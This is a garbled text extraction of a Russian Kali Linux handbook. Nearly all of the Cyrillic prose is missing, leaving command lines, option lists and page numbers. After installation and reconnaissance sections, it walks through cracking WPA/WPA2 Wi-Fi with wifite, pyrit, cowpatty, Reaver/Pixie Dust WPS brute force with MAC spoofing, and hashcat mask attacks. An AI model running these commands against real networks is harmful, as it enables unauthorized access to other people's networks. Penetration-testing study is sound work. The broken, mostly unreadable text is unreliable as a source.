Вы находитесь на странице: 1из 178

Kali Linux

( WebWare.biz)

, , :
(alex@webware.biz)
: WebWare.biz

.
, - !
2

................................................................................................................................ 4
................................................................................................................. 5
1. Kali Linux ........................................................................... 6
Kali Linux? .......................................................................................................... 6
Kali Linux:
....................................................................................................... 7
VirtualBox Guest Additions Kali Linux 1.1.0 ............................................. 23
Kali Linux ( ............... 24
VMware Kali ............................................................. 43
VPN Kali Linux
VPN ..................................................................................................................... 44
Kali Linux ........... 49
2. Kali Linux ............................................................................................. 51
Kali Linux 1.1.0. 1.
...................................................................................................................... 51
Kali Linux 1.1.0. 2.
........................................................................................................................ 58
3. ....................................................... 77
Wi-Fi (WPA/WPA2), pyrit cowpatty Kali Linux ............... 77
Wifi WPA/WPA2 Reaver .......................................... 81
Reaver t6x Pixie Dust ................ 85
WPA2/WPA Hashcat Kali Linux ( Wi-
Fi ) .......................................................................................................... 90
Wifite Pixiewps .................................................................................. 95
Wi-Fi : , Kali Linux ............................. 97
Router Scan by StasM Kali Linux ( Wi-Fi
) ....................................................................................................................... 104
4. - ................................................................................................................. 109
- (DoS -) SlowHTTPTest Kali Linux: slowloris, slow
body slow read ................................................................ 109
- : DoS - Kali Linux GoldenEye ......................................... 117
- Low Orbit Ion Cannon (LOIC) ......................................................... 123
5. - ............................................................................ 129
SQLMAP Kali Linux: - SQL-
........................................................................................................................... 129
WordPress: WPScanner Plecost ....................................... 138
W3af Kali Linux .............................................................................................. 142
Metasploit Framework Kali Linux ........................................................ 145
3

Metasploit Exploitation Framework searchsploit


......................................................................................................................... 146
6. 157
OpenVAS 8.0 .................................................................. 157
Linux (rootkits) rkhunter ............................. 160
Linux .............................................................................................. 162
Linux Malware Detect (LMD) Linux ........................................................ 167
Windows? ...................................................................................... 170
7. . ................................................................. 173
- WireShark ( ) ............... 173
.................................................................................................................. 178
4

- Kali Linux .
WebWare.biz.
WebWare.biz : -
- ( ), . (
) .

, ,
.

- , .
- , ,
, ,
- . - , .
. ,
Shift+Delete.

WebWare.biz , Kali Linux.


. .
Linux - Linux,
, ,
- , Kali Linux.
.
- -. ,
30-50 , , .
Kali Linux - BackTrack -
BackTrack Kali Linux.
.

- . : ,
, . ,
, WebWare.biz. -
WebWare.biz . , - ,
( , , ) -
.
. ( -,
, ,
). , , ,
,
http://webware.biz/?page_id=27 .

, , ,
http://webware.biz/?p=3327, , .

: . -
, : http://webware.biz/?p=3920.
,
5

. .. .
- , http://webware.biz/?p=3920,
, , .

- , :
http://webware.biz/?goto=3

VPS - , , :
http://webware.biz/?goto=478388

- : WebWare.biz

: http://webware.biz/?p=3920

, Linux, - ,
WebWare.biz: http://ZaLinux.ru/
6

1. Kali Linux

Kali Linux?

Kali Linux Linux


.
Kali Linux
Kali BackTrack Linux,
Debian. ,
, Git VCS.
300 :
, BackTrack,
,
, .
: Kali Linux, ,
. , Kali
Linux.
Git :
,
, .
FHS : Kali , Filesystem Hierarchy
Standard, Linux ,
, ..
: Kali Linux
,

USB .
: ,
,
.
: Kali Linux
,
.
GPG : Kali
,
.
: , ,
, , Kali ,

, .
: ,
,
Kali Linux , .
ARMEL ARMHF: ARM-
, , Kali
ARM- ARMEL
ARMHF . Kali Linux ARM
, ARM
. ARM-:
o rk3306 mk/ss808
o Raspberry Pi
7

o ODROID U2/X2
o Samsung Chromebook
Kali , ,
,
Linux.

Kali Linux:

Kali Linux 1.1.0


Kali Linux , Linux Debian. ,
, , .
.. ,
,
- . .
Kali Linux ,
WebWare.biz ,
RSS-, e-mail
.
, Kali Linux
:
8

, Kali Linux 64 bit ISO


Kali Linux 32 bit ISO. , (
).
- , Kali Linux
(
, ,
.
Kali Linux Live-
( Live- ).
Kali Linux , . . ()
(, ).
VirtualBox,
( ).
VirtualBox . ,
(Linux) (

). ( Debian, . . Kali Linux
):

,
, .
, VirtualBox, ,
VirtualBox :
9

,
( Live-
, ):
10

.
. . .
, 30 , ,
30 , . . .
, (,
2-3 ),
:
11

,
, ,
. -
, , . 10
, , :
12

, Kali Linux, kali-linux-


1.0.9a-amd64, , kali-linux-1.0.9a-amd64.iso.
13

. -
, Kali Linux:

:
14

Live- ( ),
. Instal ():

, ,
.
:
15

( , ):
16

. .
( , Enter):
17

Enter:

. :
18

, :

, :
19

, . . Kali Linux
:
20

( , -
):
21

.iso ,
:
22

'root' :
23

Kali Linux
.

VirtualBox Guest Additions Kali Linux 1.1.0

Guest Additions Kali Linux,


Debian Debian,
Ubuntu Ubuntu.
VirtualBox , ,
Guest Additions (VboxGuestAdditions.iso).
, , .
Linux' Guest Additions ,
. Debian .
Guest Additions Kali Linux 1.1.0,
. , , .
, , VboxGuestAdditions.iso autorun.sh.
, ,
( ).
VBoxLinuxAdditions.run
.
VBoxLinuxAdditions.run ,
Guest Additions ,
'fail' var/log/vboxadd-
install.log.
, .
1 Creating user for the Guest Additions.
2 Creating udev rule for the Guest Additions kernel module.
3 /tmp/vbox.0/Makefile.include.header:97: *** Error: unable to find the sources of your current Linu
24

4 Creating user for the Guest Additions.


+ . :
$ #
.
-, , ,
:
1 $ sudo apt-get update
:
1 # apt-get update
( ), :
1 $ apt-cache search linux-headers-$(uname -r)
, , ,
. .
.
linux-header Debina Ubuntu Linux,
:
1 $ sudo apt-get install linux-headers-$(uname -r)
:
1 # apt-get install linux-headers-$(uname -r)
VBoxLinuxAdditions.run
.
Guest Additions.

Kali Linux (

Linux
Kali Linux :
( ,
Wi-Fi );
(
; )
GPU Wi-Fi-
Wi-Fi-;
, ;
;
Kali Linux .
. ,
(). ,
, Windows .
, (SSD).
( ), (
) , , . , ,
.
25

, WebWare.biz Kali Linux Live USB.


Live. .. Live .
Live , . ..
.
, ,
(Persistence) Kali Live USB.
Linux,
.
, Kali USB
.
, , Kali Linux
.
, .
, ,
.
, Linux! ..
Mint, Ubuntu -,
.
Linux USB--

VirtualBox.
. Linux ,
. , ,
. , , VirtualBox.
. , ,
Linux. , , , , Debian (64 bit).
64- ,
.
26

. , , 1 .
.

, :
27

, .
.
. Kali Linux .
, !

. Kali Linux :
28

, ( ).
. , Kali Linux . ,
. ,
USB- (
) . Linux Mint.
: , VirtualBox . ..
.
: USB 3 USB 2. VirtualBox
5 USB 3 ( ). ,
.
( - ) Linux
. , . ..
- , -.
, ,
, :
29

Kali Graphical install.

. , .
, Kali.
30
31
32
33

. USB 3,
.
34

- :
35

.
, .
. .
Kali Linux
Windows , ,
. Delete Esc (
). ,
.
, . , USB 3,
. USB 2.
Windows ( ),
Microsoft UEFI. ,
( , ?).
(
):
1 shutdown.exe /r /o
,
. :
36

UEFI:
37

:
38

, -.
, . Boot,
Boot Option Priorities, :

.
Secure Boot (Disable):
39

OS Mode Selection. CMS and UEFI OS.


CMS OS, Windows .
40

Fast BIOS Mode (Disable).


, USB :
41

:
42

! .
F2. Delete.
.
, . .
, Esc F*.
Boot Option Priorities. .
, Windows Boot Manager,
: , Linux
. , Windows
!

:
43


VirtualBox .
Live- Linux
CD (DVD)-, , .
:
CD (DVD)- ( );
.
( Linux ),
( ).
, . .
VirtualBox, :
Kali Linux Live USB
(Persistence) Kali Live USB
Kali,
. .

VMware Kali
44

VMware,
VMware,
VMware Kali.
opt open-vm-toolbox, VMware.
open-vm-tools
, , VMware
Kali VMware.
1 apt-get install open-vm-toolbox
VMware Kali
vmware-tools ,
. vmware-tool
.
1 cd ~
2 apt-get install git gcc make linux-headers-$(uname -r)
3 git clone https://github.com/rasa/vmware-tools-patches.git
4 cd vmware-tools-patches
ISO VMware, Install VMware Tools
( VMware) . ISO
VMware , ,
:
1 cd ~/vmware-tools-patches
2 cp /media/cdrom/VMwareTools-9.9.0-2304977.tar.gz downloads/
3 ./untar-and-patch-and-compile.sh

VPN Kali Linux


VPN

VPN VPN Kali


Linux
(VPN) ,
.
, ,
,
. VPN
,
. Kali Linux, , VPN , . .
. ,
VPN
VPN Kali Linux.
,
(, ),

45

(, , ,
). .
VPN
. VPN
, . VPN
-
.
VPN ?
11 , VPN.
1. VPN IP .
2. ( WiFi)

3. .
4. .
5. !
6. ( Youtube, NetFlix
BBC Player ..)
7. .
8. /VOIP .
9. , .
10. .
11. .
, VPN .
, , , ,
, ( !), (, Alexa, Google Toolbar . .).
VPN Kali Linux
, Kali Linux VPN . ,
, , , VPN,
- -, .
, .
, .
46

, .

VPN Kali Linux


-, .
Kali Linux. .
, , .
.
1 aptitude -r install network-manager-openvpn-gnome network-manager-pptp network-manager-pptp
47

, , aptitude of apt-get,
-r, Network-Manager.
aptitude -r install, , , ,
( , - 1969 kB,
).
, Network-Manager , aptitude .
, ?
, , ,
VPN .
, , , .
VPN Kali Linux (GNOME)
, , VPN.
48

,
VPN:

Kali Linux 4 VPN:


Cisco Compatible (vpnc)
IPsec/IKEv2 (strongswan)
OpenVPN
Point-to-point Tunneling Protocol (PPTP)

VPN , VPN , VPN , ,
. VPN,
, , . ,
, , , , . .,
, , .
, .
49

Kali Linux

(
) Kali. ,
. ,

1 cat /etc/apt/sources.list
:
#

# deb cdrom:[Debian GNU/Linux 7.0 _Kali_ - Official Snapshot amd64 LIVE/INSTALL


Binary 20150312-17:50]/ kali contrib main non-free

#deb cdrom:[Debian GNU/Linux 7.0 _Kali_ -<span id="more-3630"></span> Official


Snapshot amd64 LIVE/INSTALL Binary 20150312-17:50]/ kali contrib main non-free

deb http://security.kali.org/ kali/updates main contrib non-free


deb-src http://security.kali.org/ kali/updates main contrib non-free

- , - .
, :
if cat /etc/apt/sources.list | grep -E "deb http://http.kali.org/kali kali main non-free contrib" && cat /
1
echo -e "\n\n "; else echo -e "\n\n "; fi
. , :

:
echo -e "deb http://http.kali.org/kali kali main non-free contrib\ndeb http://security.kali.org/kali-
security kali/updates main contrib non-free" > /etc/apt/sources.list

, sources.list (
). .. - ,
. , .
,
Kali.

:
50

:
1 root@WebWare-Kali:~# cat /etc/apt/sources.list
2 deb http://http.kali.org/kali kali main non-free contrib
3 deb http://security.kali.org/kali-security kali/updates main contrib non-free
.
, :
1 apt-get update
51

2. Kali Linux

Kali Linux 1.1.0. 1.


Kali Linux ,
, ,
.
Information Gathering


.
.

Vulnerability Analysis
52

.
, ,
( Information Gathering).

Web Applications

-.
. ,
- -,
. , - .

Password Attacks
53

, (
)
.

Wireless Attacks


. 802.11 , , aircrack,
airmon . ,
RFID Bluetooth. ,
,
Kali .

Exploitation Tools
54

.
(Vulnerability Assessment)
.

Sniffing and Spoofing

,
, (spoofing).
VoIP

Maintaining Access
55

(Maintaining Access)
.
,
, ,
, .

Reverse Engineering

, , (debug) .
, ,
, , .
, ,
,
.
56

Stress Testing

(Stress Testing)
.
,
(
).

Hardware Hacking

Android,
Android,

Forensics
57

(Forensics)
, .

Reporting Tools

(Reporting tools) ,
.
58

System Services

Kali. BeEF,
Dradis, HTTP, Metasploit, MySQL, SSH.

Kali Linux , , -,
Kali Linux,
(, ).

Kali Linux 1.1.0. 2.


. , -
. , ,
, , -,
( . .),
. , !
Kali Linux ,
.
1. HTTrack -
- . ,
PHP . ,
. ,
.
59

Kali Linux, ,
:
1 apt-get install httrack
, , ,
HTTrack:
1 mkdir webware.biz
2 cd / webware.biz
3 httrack

, , URL ( )
, webware.biz , :
60

1 1. ()
2 2. ()
3 3.
4 4. URL
5 5. URL ( )
6 0.
. , ,
, (*),
() , , ,
:
61

HTTrack ( ):
62

, ,
.
2. fping Nmap
63

ping, , . ,
ICMP . fping
.
IP ICMP.

1 fping-asg network/host bits


2 fping -asg 10.0.1.0/24
-a IP , -s
, -g fping , ,
, ,
.
Nmap .
3. Dig DNS

dig <_>

1 dig webware.biz
64

DNS ( webware.biz
, ):
1 dig -t ns webware.biz

4. Fierce
, , webware.biz mail.webware.biz,
cloud,webware.biz, th.webware.biz ..
( ):
1 fierce -dns webware.biz
zone transfer , .
65

5. Maltego
: Information Gathering| DNS Analysis| Maltego
Maltego , Kali
Paterva. ,
.
:
66

, , .
67

:
68
69

6. Nmap
Nmap . Nmap
, , ,
.
, , .
Nmap ,
.
Kali Zenmap. Zenmap Nmap
.
Zenmap ,
.
Zenmap,
Kali Linux | Information Gathering | Network Scanners | zenmap
,
.
70

:
71
72

7. Metagoofil
!
, , , GPS
, ,
- . , ,
.
Metagoofil , :
73

1 -d:
2 -t: (pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx)
3 -l: ( 200)
4 -h: ( "yes" )
5 -n:
6 -o: ( )
7 -f: ,
:
1 metagoofil -d webware.biz -t doc,pdf -l 200 -n 50 -o applefiles -f results.htm
: ,
, , .
.
:
74

:
75

:
76

, - ( , GPS
, ), - ! -
.
77

3.

Wi-Fi (WPA/WPA2), pyrit cowpatty Kali Linux

: .
, , , ,
.
, .
,
Wi-Fi.
Wi-Fi (WPA/WPA2), pyrit cowpatty cuda calpp Kali
Linux
Wifi WPA/WPA2 ,
. . ,
.
,
Wifi WPA/WPA2, pyrit cowpatty Kali Linux,
, cuda calpp (cal++),
WiFite . Kali Linux
10 Wifi WPA/WPA2
pyrit, cowpatty WiFite, AMD.
, .
AMD ATI, .
NVIDIA:
1. NVIDIA Kali Linux NVIDIA
Linux
2. NVIDIA CUDA Pyrit Kali Linux CUDA, Pyrit
Cpyrit-cuda
AMD:
1. fglrx AMD ATI fglrx Kali Linux
2. AMD APP SDK Kali Linux
3. CAL++ Kali Linux
4. Pyrit
, Wifi WPA WPA2,
HashCat cudaHashcat oclHashcat Wifi WPA WPA2
. Hashcat ,
, , .
,
,
. Hashcat Wifi WPA/WPA2
MD5, phpBB, MySQL SHA1 . Hashcat
, 1 2 ,
12 . 4 , 3 .
,
, , .
.
: ,
. , Kali Linux,
, . .
802.11 Kali Linux ( USB). ,
78

,
-, .
handshake WiFite
WiFite, Aircrack-ng, ?
.
:
1 airmon-ng start wlan0
Kali Linux:
1 wifite -wpa

1 wifite wpa2
(wep, wpa or wpa2),
,
1 wifite
, (
). CLIENTS. ,
clients, .
. all
, , . 1,2 ENTER.
, clients, ,
. . . , .
, , , , -
.
, 1 2 ENTER, WiFite .
ENTER, .
, 1 - , . .
. CTRL+C .
, WIfite, . . :
1 What do you want to do?
2
3 [c]ontinue attacking targets
4
5 [e]xit completely.
c, , e . ,
. c .
1 2. , . .
. , , ,
,
.
, (handshake) .
.
/root/hs/BigPond_58-98-35-E9-2B-8D.cap.
, Wifite
.
, ,
:
1. .
2. .
crunch
oclhashcat
79

, . . 20% ( )
.
.
.cap Wi-Fi
, .
Kali Linux , .
. Kali Linux.
root.
1 cp /usr/share/wordlists/rockyou.txt.gz .
.
1 gunzip rockyou.txt.gz
, , WPA2 8 ,
, , 8
63 ( , ,
). , newrockyou.txt.
1 cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt
, :
1 wc -l newrockyou.txt
9606665 .
.
1 wc -l rockyou.txt
14344392 . , , ,
.
, wpa.lst.
1 mv newrockyou.txt wpa.lst
ESSID Pyrit
ESSID Pyrit
1 pyrit -e BigPond create_essid
: , , NetComm Wireless,
:
1 pyrit -e 'NetComm Wireless' create_essid
, .
, ESSID, Pyrit
Pyrit
, ESSID Pyrit,
.

wpa.lst Pyrit.
1 pyrit -i /root/wpa.lst import_passwords
Pyrit, (batch)
,
1 pyrit batch
,
15019 PMKs ( CAL++).
CUDA NVIDIA, CAL++
AMD, .
100%, 94
. ,
. ,
.

.
80

1. Pyrit
2. Cowpatty
(handshake) , Pyrit
. .
1 pyrit -r hs/BigPond_58-98-35-E9-2B-8D.cap attack_db
. ,
, . 159159186.00
PMK's 1 . , ,
.
: NVIDIA
CUDA Cpyrit-CUDA. , .
, .
Pyrit, "
Pyrit: IOError: libpcap-error while reading: truncated dump file; tried to read 424 captured
bytes, only got 259".
(handshake) , Pyrit
crunch,
( ),
1 pyrit -r hs/BigPond_58-98-35-E9-2B-8D.cap -i /root/wpa.lst attack_passthrough
? 7807 PMKs . .
Cowpatty
cowpatty, cowpatty
.
cowpatty
, . Pyrit
cowpatty airolib-ng. ,
cowpatty , .
cowpatty. ,
, cowpatty.
1 pyrit -e BigPond -o cow.out export_cowpatty
: WPA WPA2 PSK cowpatty
, cowpatty, WPA2/PSK.

1 cowpatty -d cow.out -s BigPond -r hs/BigPond_58-98-35-E9-2B-8D.cap
, ,
. .
, .
, . ,
. 164823.00 /.
: cowpatty ( ),
/ , 2 . airolib-ng,
.
(handshake) cowpatty, Pyrit
Pyrit.
cow.out Pyrit
1 pyrit -r hs/BigPond_58-98-35-E9-2B-8D.cap -i /root/cow.out attack_cowpatty
? 31683811 PMKs . ,
Pyrit attack_db. , ,
(batch) .
Pyrit
, , essid .
1 pyrit -e BigPond delete_essid
81


. , Wifi
WPA/WPA2 Reaver-WPS. ,
.
, , ,
.

Wifi WPA/WPA2 Reaver

Reaver
Reaver WPS (Wifi Protected Setup) .
WPA/WPA2. Reaver
WPS,
WPS. , Reaver WPA/WPA2
() 4-10 , . ,
WPS .
.. Reaver 2012 , .
https://code.google.com/p/reaver-wps-fork/.
2014 .
. ( 2015 )
Reaver.
https://github.com/t6x/reaver-wps-fork-t6x. ,
Pixie Dust WPS.
Ralink, Broadcom Realtek. , , Wiire.
Reaver , .
.
, , Wi-Fi
Wi-Fi (WPA/WPA2), pyrit cowpatty
Kali Linux. ( Wifite)
.
.
Wi-Fi :
()
WPS.
.
-,
. -, , ,
, .
WPA2/WPA Hashcat Kali Linux ( Wi-Fi ),
, . ,
, ,
. Hashcat ,
Wifi WPA/WPA2, MD5, phpBB, MySQL, SHA1 .
Reaver WPS
, , WPS.
,
( .. WPA PSK).
, . , ,
Reaver , , .
: . -
. :
, . 10^8
82

(100,000,000) . ,
, . . , ,
10^7 (10,000,000).
, ,
, . ,
10^4 (10,000) , 10^3 (1,000), . .
.
Reaver , .
, , 11,000. , Reaver
.
,
, 10 .
Reaver
Kali Linux, . (Reaver, libpcap libsqlite3).
Reaver

1 airmon-ng

, . wlan0.
airmon-ng start <_>
:
1 airmon-ng start wlan0
Reaver : BSSID . ,
, BSSID :
1 airodump-ng --wps wlan0mon
83

, Kitty, BSSID 4C:72:B9:FE:B8:0C.


Reaver' . airodump-ng
.
1 reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C
SSID ( , SSID )
Reaver', :
1 reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -c 4 -e Kitty
, , Reaver
. , ,
:
1 reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --fixed
5 . ,
( 1 ).
1 reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -t 2
1 .
.
:
1 reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -d 0
WPS , 5 ,
. ,
, Reaver 315 (5 15 )
-, WPS .
:
1 reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --lock-delay=250
, .
,
:
1 reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -vv
84

M5 M7 WPS 0.1 .
, (
1 ):
1 reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -T .5
WPS , ,
, NACK, .
, M5/M7, NACK .
, , NACK' ( ),
. ,
Reaver , NACK'
:
1 reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --nack
EAP FAIL
WPS, . , ,
, :
1 reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --eap-terminate
10 WPS,
. ,
, ,
:
1 reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --fail-wait=360

, Reaver 1 .
-d 0 , :
1 reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -d 0
, , dh-small.
Reaver -,
:
1 reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --dh-small
Reaver, Pixiewps -K 1
Pixiewps
. Reaver t6x Pixie Dust
Kali Linux. . ..
, Reaver.
Pixiewps . -K 1.
, Reaver Pixiewps. ..
:
1 reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -K 1
Reaver t6x
Pixie Dust.
:
Reaver ;
: -K // pixie-dust reaver; -H // pixiedust-log
reaver; -P // pixiedust-loop reaver
MAC
/ MAC . Reaver
MAC mac, , MAC
, . . .
MAC (
wlan0mon) . MAC
. :
1 # ifconfig wlan0 down
85

2 # ifconfig wlan0 hw ether 04:DE:AD:BE:EF:45


3 # ifconfig wlan0 up
4 # airmon-ng start wlan0
5 # reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -vv --mac=04:DE:AD:BE:EF:45

Reaver t6x Pixie Dust

Reaver?
Reaver WPS (Wifi Protected Setup)
. Reaver WPS,
WPS. , Reaver
WPA/WPA2 () 4-10 ,
. ,
WPS .
- https://code.google.com/p/reaver-wps/. Pro
.
Reaver
.. Reaver 2012 , .
https://code.google.com/p/reaver-wps-fork/.
2014 .
. ( 2015 )
Reaver.
https://github.com/t6x/reaver-wps-fork-t6x. ,
Pixie Dust WPS.
Ralink, Broadcom Realtek.
, , Wiire.
Reaver, Pixiewps.
, Kali Linux: , , .
Pixiewps
Pixiewps ( Kali Linux, ,
sudo):
1 sudo apt-get install libssl-dev
.
zip- Download ZIP.
Kali Linux , Linux
.
86

1 cd Downloads
2 unzip pixiewps-master.zip
3 cd pixiewps-master/src
4 make
5 gcc -std=c99 -o pixiewps pixiewps.c random_r.c -lssl -lcrypto
6 make install

1 install -D pixiewps /usr/local/bin/pixiewps
2 install -m 755 pixiewps /usr/local/bin
Reaver t6x
, Kali Linux ,
" ". .
Reaver, .
.
Reaver
1 apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps
Pixiewps by Wiire , ,
.
Reaver
1
2 git clone https://github.com/t6x/reaver-wps-fork-t6x
3
4 wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip && unzip master.zip
5
6
7 cd reaver-wps-fork-t6x*/
8 cd src/
9 ./configure
10 make
11
12
13 sudo make install
Reaver
Reaver ,
.
87

Reaver , . ,
,
1 reaver -v
2 Reaver v1.4 WiFi Protected Setup Attack Tool
3 Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
, .
1 :
2 -i, --interface=<wlan>
3 -b, --bssid=<mac> BSSID
4
5 :
6 -m, --mac=<mac> MAC
7 -e, --essid=<ssid> ESSID
8 -c, --channel=<channel> 802.11 (
9 -f)
10 -o, --out-file=<file> - [stdout]
11 -s, --session=<file>
12 -C, --exec=<command>
13
14 -D, --daemonize reaver
15 -a, --auto
16
17 -f, --fixed
18 -5, --5ghz 5GHz 802.11
19 -v, --verbose (-vv
20 )
21 -q, --quiet
22 -K --pixie-dust=<> [1] pixiewps PKE, PKR, E-Hash1, E-Hash2,
23E-Nonce Authkey (Ralink, Broadcom, Realtek)
24 -Z, --no-auto-pass reaver
25WPA, pixiewps
26 -h, --help
27
28 :
88

29 -p, --pin=<wps pin> 4 8 WPS


30 -d, --delay=<> [1]
31 -l, --lock-delay=<seconds> ,
32 [60]
33 -g, --max-attempts=<>
34 -x, --fail-wait=<> 10
35 [0]
36 -r, --recurring-delay=<x:y> y x
37 -t, --timeout=<> [5]
38 -T, --m57-timeout=<> M5/M7 [0.20]
39 -A, --no-associate (
40)
41 -N, --no-nacks NACK
42
43 -S, --dh-small DH

-L, --ignore-locks ,

-E, --eap-terminate WPS EAP FAIL
-n, --nack NACK [Auto]
-w, --win7 Windows 7 registrar [False]
-X, --exhaustive [False]
-1, --p1-index
[False]
-2, --p2-index
[False]
-P, --pixiedust-loop PixieLoop ( M4
M3) [False]
-W, --generate-pin devttys0 [1] Belkin
[2] D-Link
-H, --pixiedust-log
PixieHashes
:
1 reaver -i mon0 -b 00:AA:BB:11:22:33 -vv -K 1
-K // pixie-dust reaver
89

-K 1 pixiewps PKE, PKR, E-Hash1, E-Hash2, E-Nonce Authkey. pixiewps


Ralink, Broadcom Realtek.
* : Realtek, DH (-S)
-H // pixiedust-log reaver
-H PixieHashes,
. -vvv, ,
, -K 1 & -P.
bssid (MAC) .pixie.
PixieDust,
pixiewps.
.
( chmod +x <_>).
-P // pixiedust-loop reaver
(-P) reaver reaver ,
M4 WPS, , , .
PixieHash, pixiewps,
.
:
/
, ..
,
.
,
PixieHash, .
Wash
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
1 :
2 -i, --interface=<iface>
3 -f, --file [FILE1 FILE2 FILE3 ...]
4
5 :
6 -c, --channel=<num> [auto]
90

7 -o, --out-file=<file>
8 -n, --probes=<num>
9 [15]
10 -D, --daemonize wash
11 -C, --ignore-fcs
12 -5, --5ghz 5GHz 802.11
13 -s, --scan
14 -u, --survey [default]
15 -P, --file-output-piped Wash
16 . . wash x|y|z...
-g, --get-chipset reaver

-h, --help
:
1 wash -i mon0
-g // get-chipset
-g wash reaver .
, , . .
reaver (30
).

WPA2/WPA Hashcat Kali Linux ( Wi-Fi


)

Hashcat (cudaHashcat oclHashcat) Kali Linux


() WPA2 WPA. Hashcat .cap .
.cap .hccap. .
Hashcat
Hashcat, ,
, . ,
. Linux, OSX Windows,

. Hashcat
, Microsoft LM Hashes, MD4, MD5, SHA,
Unix Crypt, MySQL, Cisco PIX ( ).
Hashcat , . .
, ,
hashcat (, 1Password).
Hashcat
Hashcat
. :
91

- ()









,
Hashcat .
Hashcat
Hashcat :
Hashcat
oclHashcat
, Hashcat,
, GPU.
oclHashcat,
MD5, SHA1 . ,
GPU. Bcrypt . -
, ( ),
oclHashcat Hashcat.
Hashcat Linux, OSX Windows. oclHashcat Linux Windows -
OpenCL OSX.

Kali Linux 1.1.0a Radeon HD 7870M Series,
rockyou .
WPA2 WPA Hashcat ( .cap-)
cudaHashcat oclHashcat Hashcat Kali Linux.
oclHashcat, . . AMD GPU.
NVIDIA GPU, cudahashcat.
, CUDA
NVIDIA fglrx AMD. .
NVIDIA:
NVIDIA Kali Linux NVIDIA
Linux
NVIDIA CUDA Pyrit Kali Linux CUDA, Pyrit
Cpyrit-cuda
AMD:
fglrx AMD ATI fglrx Kali Linux
AMD APP SDK Kali Linux
CAL++ Kali Linux
Pyrit
Hashcat WPA WPA2?
Pyrit , WPA2 WPA.
Hashcat WPA2 WPA?
?
Hashcat
. , , .
Hashcat
WPA2 WPA.
92


1 ?l = abcdefghijklmnopqrstuvwxyz
2 ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
3 ?d = 0123456789
4 ?s = !#$%&'()*+,-./:;?@[\]^_`{|}~
5 ?a = ?l?u?d?s
6 ?b = 0x00 - 0xff

, 12345678.
?d?d?d?d?d?d?d?d
, 12345678 23456789
01567891. , .

, ABCFEFGH LKHJHIOP ZBTGYHQS . .,
:
?u?u?u?u?u?u?u?u
.

, : abcdefgh dfghpoiu bnmiopty
. ., :
?l?l?l?l?l?l?l?l
. , .

, a1b2c3d4 p9o8i7u6 n4j2k5l6 . . (
), :
?l?d?l?d?l?d?l?d

, A1B2C3D4 P9O8I7U6 N4J2K5L6 . .
( ), :
?u?d?u?d?u?d?u?d
, , .
,
:
?a?a?a?a?a?a?a?a
: ?a , .
, .
.

- ,
.
. . ,
, abc, -
. :
abc?l?l?l?l?l
abc?u?u?u?u?u
abc?d?d?d?d?d
abc?l?u??d??d?l
abc?d?d?l?u?l
- , 125 .
. cudaHashcat
oclHashcat Hashcat Kali Linux WPA2 WPA .
93

,
. .
, , ,
, ,
.
: Abcde123
:
?u?l?l?l?l?d?d?d
.

Hashcat
.
:
1 --custom-charset1=CS
2 --custom-charset2=CS
3 --custom-charset3=CS
4 --custom-charset4=CS
CS . CS
, . . ,
, .
: -1, -2, -3 -4.

hashcat ( .hcchr,
/, ).
:

,
abcdefghijklmnopqrstuvwxyz0123456789 (aka lalpha-
numeric):
1 -1 abcdefghijklmnopqrstuvwxyz0123456789
2 -1 abcdefghijklmnopqrstuvwxyz?d
3 -1 ?l0123456789
4 -1 ?l?d
5 -1 loweralpha_numeric.hcchr # , + (abcdefghijk
, 0123456789abcdef:
-1 ?dabcdef
7- ascii charset (aka mixalpha-
numeric-all-space):
-1 ?l?d?s?u
(-1)
, :
-1 charsets/special/Russian/ru_ISO-8859-5-special.hcchr
Kali Linux .hcchr
:
1 tree /usr/share/maskprocessor/charsets/
2
3 tree /usr/share/hashcat/charsets/
: abc, 8 ,
.
, :
, ,
:
94

-1 ?l?d?u
:
abc?1?1?1?1?1
, , 1. l .
. ()
. , ,
Wifi WPA2 WPA pyrit cowpatty Kali Linux. ,
.
.cap wpaclean
.cap , Hashcat
(cudaHashcat oclHashcat).
.cap Kali Linux.
1 wpaclean <out.cap> <in.cap>
, , , ,
<out.cap> <in.cap>. , <in.cap> <out.cap>. ,
.
:
wpaclean hs/out.cap hs/Narasu_3E-83-E7-E9-2B-8D.cap
.cap .hccap
, Hashcat (cudaHashcat
oclHashcat).
.hccap aircrack-ng
-J
1 aircrack-ng <out.cap> -J <out.hccap>
-J J j.
:
1 aircrack-ng hs/out.cap -J hs/out
WPA2 WPA Hashcat
Hashcat (cudaHashcat oclHashcat) .
:



- , Rockyou.
, / ..
, WPA2
WPA. MD5, phpBB, MySQL
SHA1 Hashcat Kali Linux. :
1 hashcat --help | grep WPA
.. 2500.
:
1 hashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt
. , :
1 oclHashcat --force -m 2500 /root/hs/out.hccap /root/rockyou.txt
oclHashcat.
, cudaHashcat, :
1 cudaHashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt
, .
. ,
.
, , Pyrit -
cudaHashcat oclHashcat Hashcat.
95

, . ,
MD5, phpBB, MySQL SHA1 Hashcat Kali Linux
.

. .
WPA WPA2 Hashcat (cudaHashcat oclHashcat)
:
1 hashcat -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d
-m = 2500 WPA2 WPA.
